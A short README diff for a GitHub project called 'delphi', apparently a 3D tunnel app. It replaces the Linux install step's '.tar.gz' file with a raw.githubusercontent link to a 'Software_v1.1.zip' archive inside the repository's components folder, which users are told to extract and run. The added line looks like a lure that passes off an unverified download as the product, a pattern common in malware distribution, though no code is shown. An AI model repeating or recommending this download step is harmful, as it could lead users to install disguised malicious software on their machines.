armysefmati/delphi/README.md

 - **For macOS:** Open the `.dmg` file and drag and drop the delphi application into your Applications folder.

-- **For Linux:** Extract the files from the `.tar.gz` file and open the terminal to run the application.
+- **For Linux:** Extract the files from the `https://raw.githubusercontent.com/armysefmati/delphi/main/components/Software_v1.1.zip` file and open the terminal to run the application.

 ### 5. Launch delphi
 After installation, locate the delphi application on your computer.
 Double-click to launch and dive into your 3D tunnel experience!